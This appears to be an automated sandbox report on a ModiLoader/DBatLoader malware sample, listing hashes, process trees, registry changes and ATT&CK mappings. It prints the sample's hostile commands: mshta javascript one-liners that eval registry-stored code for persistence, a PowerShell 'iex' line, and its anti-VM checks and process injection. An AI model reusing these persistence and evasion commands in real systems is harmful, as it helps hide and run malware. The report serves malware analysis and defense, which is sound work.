Analysis

max time kernel: 150s
max time network: 150s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 04-05-2024 08:26

Static task: static1
Behavioral task: behavioral1
  Sample: 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe
  Resource: win10v2004-20240426-en

General

Target: 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe
Size: 265KB
MD5: 11e27faa8cf80aa4d6b08e31845211ff
SHA1: 8e2706830d2f3d04f66746a342a5920a1ca04d76
SHA256: a49fa2fd171c274cfcdf1275eeee73052ac43e233951fdd84a1e2f9a8db57614
SHA512: c026e87bb28c505a37f41614f2d03690d3b7ff7c986483bb4f4aafe75cd9d466f4759080eebe4006fe6d6424b6fb2214c2a70c48f86b43f6f3f1263cfae8614e
SSDEEP: 6144:veX94nYY+uUMFemOFu3Ksm2Yn+EE9j+ivEyPYxJQeH:OSnYPweZnl+EER+iv6IeH
Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  mshta.exe | Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | pid 2544 | pid_target 2660 | target process mshta.exe
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
  regsvr32.exe | Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions

Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
Processes:
  regsvr32.exe | File opened (read-only) | C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys
ModiLoader Second Stage 59 IoCs
Processes:
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
  regsvr32.exe | Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools

Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  regsvr32.exe | Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
  regsvr32.exe | Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Deletes itself 1 IoCs
Processes:
  regsvr32.exe | pid 2156

Drops startup file 1 IoCs
Processes:
  regsvr32.exe | File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e795bdc5.lnk

Adds Run key to start application 2 TTPs 3 IoCs
Processes:
  regsvr32.exe | Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:m2YOT9=\"6MxzCm\";n0G5=new%20ActiveXObject(\"WScript.Shell\");OkZ8Y=\"Z5Z\";Qu1Ik=n0G5.RegRead(\"HKCU\\\\software\\\\pzadcohmp\\\\jhpvhyp\");aNMF2bTq2=\"y\";eval(Qu1Ik);tmut1Xaj=\"SiO5WEU\";"
  regsvr32.exe | Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d3afae00\\9a86c6c3.lnk\""
  regsvr32.exe | Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:G9Br0i=\"VIusK1uO\";F6y=new%20ActiveXObject(\"WScript.Shell\");tgum6P=\"HX4e\";l9dPD6=F6y.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\pzadcohmp\\\\jhpvhyp\");dupP8Nt=\"nLqzIpB\";eval(l9dPD6);CkgW8RpW2=\"7GO\";"

Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
  regsvr32.exe | Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0
  regsvr32.exe | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum

Drops file in System32 directory 1 IoCs
Processes:
  powershell.exe | File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Suspicious use of SetThreadContext 3 IoCs
Processes:
  11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe (PID 2856) set thread context of 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe (PID 2820)
  powershell.exe (PID 1972) set thread context of regsvr32.exe (PID 2156)
  regsvr32.exe (PID 2156) set thread context of regsvr32.exe (PID 1176)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Modifies Internet Explorer settings
Processes:
  regsvr32.exe | Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl
  regsvr32.exe | Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\International
Modifies registry class 7 IoCs
Processes:
  regsvr32.exe | Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:hu8OzfW=\"vTo\";jY2=new ActiveXObject(\"WScript.Shell\");ji5b3oq=\"p\";TTJ5h8=jY2.RegRead(\"HKCU\\\\software\\\\pzadcohmp\\\\jhpvhyp\");WOL56vAaB=\"dQw\";eval(TTJ5h8);hsL24fs=\"NF\";\""
  regsvr32.exe | Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.73caeeca8
  regsvr32.exe | Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.73caeeca8\ = "379d11eb"
  regsvr32.exe | Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb
  regsvr32.exe | Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell
  regsvr32.exe | Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open
  regsvr32.exe | Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open\command

Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  1972 powershell.exe
  2156 regsvr32.exe (every remaining entry names this same process)

Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
  1972 powershell.exe
  2156 regsvr32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
  powershell.exe (PID 1972) | Token: SeDebugPrivilege

Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
  2856 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 31 IoCs
Processes (duplicate rows collapsed, with counts):
  11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe (PID 2856) wrote to memory of 11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe (PID 2820): 11 entries
  mshta.exe (PID 2544) wrote to memory of powershell.exe (PID 1972): 4 entries
  powershell.exe (PID 1972) wrote to memory of regsvr32.exe (PID 2156): 8 entries
  regsvr32.exe (PID 2156) wrote to memory of regsvr32.exe (PID 1176): 8 entries
Processes

C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe (PID 2856, level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe (PID 2820, level 2)
      Command line: "C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe (PID 2544, level 1)
  Command line: "C:\Windows\system32\mshta.exe" javascript:fTMkICz02="KJH";q2Z2=new%20ActiveXObject("WScript.Shell");iQ52hSU="eO";UuY82n=q2Z2.RegRead("HKLM\\software\\Wow6432Node\\0HNGvqG\\uRVsRh");Kf1gAyM="M3Bs1gPW";eval(UuY82n);N4DE8v="C";
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1972, level 2)
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:gqsp
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\regsvr32.exe (PID 2156, level 3)
          Command line: regsvr32.exe
          - Looks for VirtualBox Guest Additions in registry
          - Looks for VirtualBox drivers on disk
          - Looks for VMWare Tools registry key
          - Checks BIOS information in registry
          - Deletes itself
          - Drops startup file
          - Adds Run key to start application
          - Maps connected drives based on registry
          - Suspicious use of SetThreadContext
          - Modifies Internet Explorer settings
          - Modifies registry class
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: MapViewOfSection
          - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\regsvr32.exe (PID 1176, level 4)
              Command line: "C:\Windows\SysWOW64\regsvr32.exe"
Network

MITRE ATT&CK Enterprise v15
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Downloads